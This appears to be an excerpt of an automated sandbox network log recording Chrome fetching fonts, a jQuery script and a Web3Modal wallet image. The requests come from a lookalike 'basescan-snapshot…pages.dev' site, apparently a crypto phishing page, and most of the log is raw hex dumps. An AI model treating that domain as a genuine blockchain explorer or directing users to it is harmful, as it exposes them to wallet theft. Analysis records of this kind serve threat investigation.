                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: d5 ea 68 d5 e9 4c 73 2c 29 0b 47 e9 61 c3 86 b3 56 52 18 81 2a 1a 55 8e 55 ff ff f9 6b 89 8f 37 fb 60 f6 89 59 1b 2d 4f 9e 67 01 66 38 8b 3b 17 b4 98 6b 18 b6 69 03 c6 60 3a 2f 10 ab ab c4 32 e5 4e aa 52 c0 a7 62 7b fe d3 22 68 46 59 f4 3f 6a e5 1d 56 a8 51 f7 a6 dc b8 d1 00 a1 aa b0 0b c7 ea 91 c6 1e ed 9d f9 db 8a 2e e5 9c 40 40 46 98 01 35 b2 48 ac 99 7a 10 70 4f ca 42 20 77 4d 10 89 a5 15 c3 95 41 ce 86 ab af 34 d4 41 f9 a0 d8 d7 0f b7 6e bd 8a ab 21 24 e8 d1 13 76 4c 0f 1d f3 73 a6 12 ea 10 17 b1 50 43 89 76 c8 ff 41 dc c4 52 5c 25 44 26 d5 0c ad 2d 2c 8a ae 80 bd 68 15 c4 0a 16 69 16 2f 49 eb 0c fd 78 75 4f 8f e9 89 8a 82 ba b2 b4 45 ca e4 9e fb 27 bb 37 6a 23 01 46 b4 9b c9 18 79 5f 01 7a db dd a2 dc 4c fd 1a 28 41 40 31 44 05 5a 47 6b 20 7b 74 a7
                                                                                                                                                                                                                                              Data Ascii: hLs,)GaVR*UUk7`Y-Ogf8;ki`:/2NRb{"hFY?jVQ.@@F5HzpOB wMA4An!$vLsPCvAR\%D&-,hi/IxuOE'7j#Fy_zL(A@1DZGk {t
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 06 7f 73 66 71 d5 f7 77 4b 9a 4b 94 7d 0f 1e 8f e1 ae a4 a1 2a 0b 24 2f 6e b7 44 ac ce ab d2 e2 52 fd 45 f0 b9 a2 07 e1 ce df 9f f1 f9 31 9c d1 ab d1 3a c6 27 4b 72 96 35 c5 72 6c 4c c0 b3 ec 63 fc f1 03 11 39 da ad c7 d1 a6 bb 95 2b e7 54 43 4f da 5a 6f 54 18 db 46 5b 86 5d b2 e2 ea 5c 19 bc 32 ae 68 d9 57 53 57 a5 6b a1 5c 0a 20 c3 b7 2b f9 b5 47 a3 f5 1d 9d 8e ae b8 99 1d c6 57 26 30 45 f5 76 03 2f 16 ca 38 d6 7a 6c 50 f5 21 92 df 13 95 a0 9a 62 f3 8f e3 01 13 e4 c9 a3 cb c2 15 8d 84 dc ab e1 ea aa 35 e2 d8 b1 44 5a 13 ca 08 e6 b0 87 6d 87 2a 32 eb 98 75 ca b9 44 6f 98 0d 5d d8 ed 52 5e 59 56 14 48 b9 dd 25 48 24 82 6c 8e 01 55 56 35 ca f6 f9 2d 59 ce 63 28 69 e7 59 11 2e 8e 67 83 65 10 ce 2f 67 2d 37 12 69 c9 f6 d0 81 16 30 b9 0a 97 b4 a8 8b 2b 3b 9c
                                                                                                                                                                                                                                              Data Ascii: sfqwKK}*$/nDRE1:'Kr5rlLc9+TCOZoTF[]\2hWSWk\ +GW&0Ev/8zlP!b5DZm*2uDo]R^YVH%H$lUV5-Yc(iY.ge/g-7i0+;
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 99 d6 8b 55 73 53 ea e1 17 2c ec 2f c3 8d e2 1f 88 5e 16 d9 19 86 53 20 fc 8b 10 22 29 bb 35 b3 61 c4 c5 8b 23 6d 9e 55 6d 97 42 40 5a 56 5d 63 ff fa 7c 35 87 b0 c0 d0 46 18 d8 af e5 6f 1f 7d ab a5 26 ad ac a6 ac 61 20 8f a3 11 3d 7d d2 3c 96 0f 57 ff 6c f4 cf 49 a5 60 94 c4 83 31 3d 47 e2 17 fd 22 39 9e 59 ab fe 30 b7 79 40 c8 2c 75 bb a5 f9 6b 4d a0 56 d1 38 83 f3 0b 2b 94 11 48 43 92 75 55 c9 6c f5 72 d2 fb cb 57 68 95 ca 68 10 de dd d3 f5 08 25 95 d6 af fe f3 ca 5f 3e 7a 39 e4 c3 7e ee 44 27 51 9e 65 f2 2f 9a a9 dc ef 06 51 43 ed b6 ea fc 02 50 13 0b 66 b5 59 3a 97 44 bd 34 00 07 30 76 46 2e 46 8a b9 c6 be 6a 53 58 00 ec 5d 67 f6 2d f5 d1 15 45 f9 4a 33 7b ec 3f 37 fd 7b 47 d7 a6 49 ea c8 9d c9 f9 73 24 f1 62 4e d3 d9 06 57 c6 c5 52 91 36 46 02 2e 2d
                                                                                                                                                                                                                                              Data Ascii: UsS,/^S ")5a#mUmB@ZV]c|5Fo}&a =}<WlI`1=G"9Y0y@,ukMV8+HCuUlrWhh%_>z9~D'Qe/QCPfY:D40vF.FjSX]g-EJ3{?7{GIs$bNWR6F.-


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              115192.168.2.549864104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC707OUTGET /assets/vendor/font-awesome/webfonts/fa-regular-400.ttf HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 1134648
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Wed, 28 Feb 2024 00:49:24 GMT
                                                                                                                                                                                                                                              ETag: "0c22df9df69da1:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59658
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fM1DFbDynBVtGQaMUZ%2Fi755O0ptykBg5VgfbdR3FD1AQXxGwOQTOPfyFgMkkenKMguKm%2FA4YdrboQF%2FcovQGfD2bmw3qO8LzdYmRBVR75nGPfIcCMUY8huAWfvUaUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e49c4f41f9-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC558INData Raw: 00 01 00 00 00 0a 00 80 00 03 00 20 4f 53 2f 32 5f 7b 5e 99 00 00 01 28 00 00 00 60 63 6d 61 70 c7 60 2e f3 00 00 34 d0 00 00 48 78 67 6c 79 66 79 3f ff 8f 00 00 b0 94 00 0f dc 98 68 65 61 64 27 bc 19 90 00 00 00 ac 00 00 00 36 68 68 65 61 04 4c 0e fd 00 00 00 e4 00 00 00 24 68 6d 74 78 21 49 1f 2c 00 00 01 88 00 00 33 48 6c 6f 63 61 63 4e f0 f8 00 00 7d 48 00 00 33 4c 6d 61 78 70 0c fa 08 3c 00 00 01 08 00 00 00 20 6e 61 6d 65 81 c4 9a 03 00 10 8d 2c 00 00 03 f9 70 6f 73 74 2e 55 46 bb 00 10 91 28 00 00 bf 0e 00 01 00 00 03 05 03 00 89 c5 79 d2 5f 0f 3c f5 00 0b 02 00 00 00 00 00 e1 8d 6b 09 00 00 00 00 e1 8d 6b 09 ff f5 ff b5 02 89 01 cb 00 00 00 08 00 02 00 01 00 00 00 00 00 01 00 00 01 cb ff b5 00 00 02 80 ff f5 ff f5 02 89 00 01 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: OS/2_{^(`cmap`.4Hxglyfy?head'6hheaL$hmtx!I,3HlocacN}H3Lmaxp< name,post.UF(y_<kk
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 01 40 00 00 01 40 00 00 01 40 00 20 01 c0 00 00 01 80 00 00 01 c0 00 00 01 40 00 00 01 c0 00 00 01 40 00 00 01 40 ff fc 01 80 00 00 01 80 00 00 01 80 ff fb 02 40 ff fc 01 80 ff f9 01 80 ff f9 01 80 ff fc 00 c0 00 00 01 40 ff fa 00 c0 00 30 00 c0 00 20 01 00 ff f9 00 40 00 08 01 00 00 20 01 c0 00 00 02 80 00 00 02 80 00 20 02 00 00 00 02 00 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 80 00 00 01 c0 00 00 02 40 ff f9 02 80 00 00 02 80 ff f9 02 80 00 00 02 80 ff f9 02 40 00 00 02 00 00 00 02 80 00 7c 02 00 00 01 01 80 00 00 01 80 00 00 01 80 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 00 ff fa 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 80 00 00 02 00 ff fd 01 c0 00 00 02 80 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @@@ @@@@@0 @ @@|@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 00 01 80 00 00 01 80 00 10 01 80 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 80 00 00 02 00 ff fb 02 00 ff fb 02 00 00 00 01 80 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 02 80 ff f9 02 40 00 00 02 40 00 00 02 00 00 00 02 80 ff f9 02 80 00 00 01 80 00 10 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 00 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 40 00 00 02 40 00 00 01 80 ff ff 01 80 ff ff 01 c0 00 00 02 40 00 00 01 c0 00 00 02 00 00 20 02 00 00 20 01 c0 00 00 01 c0 00 00 01 80 00 00 02 40 00 00 02 80 ff f9 02 40
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@@@@@@@@@@@@ @@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 01 80 00 00 01 80 00 05 02 00 00 01 01 80 00 10 01 80 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 40 00 00 01 80 00 00 01 80 00 00 02 00 ff f9 01 c0 00 00 02 80 ff f9 01 80 00 00 02 00 ff fd 02 80 ff fa 02 00 00 00 02 00 ff f9 01 80 00 00 02 80 00 00 02 40 00 00 01 80 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 10 02 00 00 00 02 00 ff fe 02 80 ff f9 02 00 00 00 02 00 00 00 02 00 00 14 02 00 00 08 02 00 00 14 02 00 00 00 02 40 ff fb 02 00 00 00 01 c0 00 00 01 c0 00 00 02 00 ff fb 02 00 00 00 02 00 00 00 02 80 00 00 02 80 00 00 01 c0 00 00 02 80 00 00 02 80 00 00 02 00 00 00 02 00 ff fc 02 00 00 00 01 80 00 1a 02 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 40 00 03 01 80 00 00 01 00 ff fc 02 00 00 00 02 00 00 00 02 00 00 09 01 80 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 00 ff fb 01 40 ff fe 01 c0 00 00 02 40 00 08 02 00 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 80 ff f9 02 80 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 80 00 60 02 00 00 10 02 00 00 00 02 00 ff fd 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 40 00 00 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 80 00 18 02 00 00 00 02 80 00 00 02 80 ff fe 02 00 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@`@@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 00 01 40 00 05 02 80 00 00 02 00 00 00 02 80 00 00 02 00 00 00 01 80 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 80 00 0e 02 00 00 00 01 c0 ff f9 02 40 ff fe 02 40 ff fe 02 00 00 00 02 00 00 00 02 80 00 20 01 40 00 10 02 40 00 00 02 80 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 80 ff fe 02 80 00 00 02 00 ff fe 02 00 00 00 02 00 ff f9 02 80 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 40 ff f9 01 c0 00 00 02 00 00 00 02 40 ff fa 02 40 ff fa 01 c0 ff f7 02 00 00 20 02 00 00 20 01 c0 ff fa 01 c0 00 00 02 00 00 00 02 80 00 08 02 80 00 00 02 40 00 00 02 80 00 00 02 80 00 00 02 80 00 00 02 00 00 0a 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02
                                                                                                                                                                                                                                              Data Ascii: @@@@@ @@@@@@@ @
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 00 02 80 00 00 02 00 00 20 01 c0 00 00 01 c0 00 00 02 00 00 21 02 00 00 41 01 c0 00 21 01 c0 00 21 01 40 00 21 01 40 00 41 01 c0 00 21 01 c0 00 21 02 80 00 00 01 c0 00 00 01 80 00 10 01 c0 00 00 01 c0 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 01 c0 00 00 02 40 ff f9 02 80 00 00 02 40 00 13 01 c0 00 0d 02 00 00 00 01 c0 00 00 02 80 ff f9 00 c0 00 00 02 00 00 00 02 00 00 00 02 40 00 2a 02 00 00 00 01 80 00 10 02 80 ff f9 02 00 00 0f 01 c0 00 00 02 00 ff fb 02 00 ff fd 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 ff f9 01 c0 00 00 02 00 00 00 01 c0 00 0a 00 80 00 0a 01 c0 00 00 02 00 00 00 02 40 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 00 00 00 01 c0
                                                                                                                                                                                                                                              Data Ascii: !A!!@!@A!!@@@@*@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 01 c0 00 00 01 c0 00 00 01 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 02 80 00 09 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 40 00 00 02 80 ff f9 02 00 00 00 02 80 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 40 00 00 02 00 00 20 00 c0 00 17 02 00 00 00 02 00 ff fb 02 40 00 20 01 80 00 00 01 80 00 00 02 40 00 00 02 40 00 00 01 80 00 00 01 80 00 10 01 80 00 10 01 80 00 10 01 80 00 10 02 40 00 00 02 80 ff f9 02 40 00 00 01 80 00 00 02 00 00 00 02 00 00 0f 01 c0 00 00 02 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@ @ @@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 80 00 00 02 00 00 00 02 00 ff fa 02 00 00 00 02 40 00 00 02 00 ff f9 01 80 00 00 01 80 00 00 02 40 00 00 02 00 00 00 01 80 00 00 01 80 00 00 01 80 00 00 02 40 00 00 01 80 00 00 02 00 00 02 02 40 00 02 02 00 00 00 02 40 ff fa 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 ff f8 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 01 c0 00 00 01 40 00 00 02 00 00 00 02 00 00 00 02 40 00 00 02 00 ff f7 02 00 00 00 02 80 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 00 00 02 40 00 00 02 40 00 00 02 00 ff fe 02 00 00 00 02 00 00 00 02 00 00 00 01 80 00 00 02 00 00 00 02 40 00 00
                                                                                                                                                                                                                                              Data Ascii: @@@@@@@@@@
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: ff fd 02 40 ff fd 02 80 ff fd 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 80 ff f9 02 80 00 00 02 00 00 00 01 c0 00 20 01 80 00 00 01 c0 00 10 01 c0 00 10 01 80 00 00 02 40 00 00 01 80 00 00 02 40 00 00 02 80 00 00 02 40 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 40 00 00 01 80 00 04 02 80 ff fb 01 c0 ff fd 02 40 ff fb 02 40 00 00 02 40 ff f9 01 80 00 00 01 c0 ff f9 02 80 00 00 02 40 ff ff 02 00 ff f9 02 00 ff f9 02 00 ff f9 02 00 00 00 02 40 ff ff 02 40 00 00 02 00 00 00 02 80 00 00 02 80 00 00 02 80 00 00 02 80 00 00 01 c0 ff fa 02 00 00 00 02 40 00 00 02 40 ff fe 02 80 00 00 02 40 00 00 02 00 00 00 02 40 00 00 02 80 00 00 02 00 00 00 01 c0 00 00 01 c0 00 00 02 40 00 00 02 40 00 00 02 80 00 00 02 80 00 00 02 00 00 0f 02 00 00 00 01 c0 ff fa 02
                                                                                                                                                                                                                                              Data Ascii: @ @@@@@@@@@@@@@@@@


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              116192.168.2.549863104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC612OUTGET /assets/js/components/hs.focus-state.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC871INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 533
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=868
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 87386
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6mSbOx5Sw7MesciWLtaIWvs3CukqiOZmdNdpvGBj1BNJ3aos1aK8zlB0IFWwKT1V0CEIUyhEnBiUdA%2Fdj8AczrVMFlXWoK%2BFzn2nuR0Eo%2FmYrw7wFiLQrskq5ta2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e49caec404-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC498INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 46 6f 63 75 73 53 74 61 74 65 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 6f 6c 6c 65 63 74 69 6f 6e 3d 24 28 27 2e 6a 73 2d 66 6f 63 75 73 2d 73 74 61 74 65 20 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 20 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 29 2c 20 2e 6a 73 2d 66 6f 63 75 73 2d 73 74 61 74 65 20 74 65 78 74 61 72 65 61 2c 20 2e 6a 73 2d 66 6f 63 75 73 2d 73 74 61 74 65 20 73 65 6c 65 63 74 27 29 3b 69 66 28 21 63 6f 6c 6c 65 63 74 69 6f 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 63 6f 6c 6c 65 63 74 69 6f 6e 2e 6f 6e 28 27 66 6f 63
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSFocusState={init:function(){var collection=$('.js-focus-state input:not([type="checkbox"], [type="radio"]), .js-focus-state textarea, .js-focus-state select');if(!collection.length)return;collection.on('foc
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC35INData Raw: 28 27 75 2d 66 6f 63 75 73 2d 73 74 61 74 65 27 29 3b 7d 29 3b 7d 7d 3b 7d 29 28 6a 51 75 65 72 79 29 3b
                                                                                                                                                                                                                                              Data Ascii: ('u-focus-state');});}};})(jQuery);


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              117192.168.2.549861104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC800OUTGET /getWalletImage/45f2f08e-fc0c-4d62-3e63-404e72170500 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 1052
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2e49f6f4288-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 13117
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfUhkIr6pXeZzg1ZKkKbDihKqDUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:07 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=22+26 c=2+24 v=2024.9.3 l=1052 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
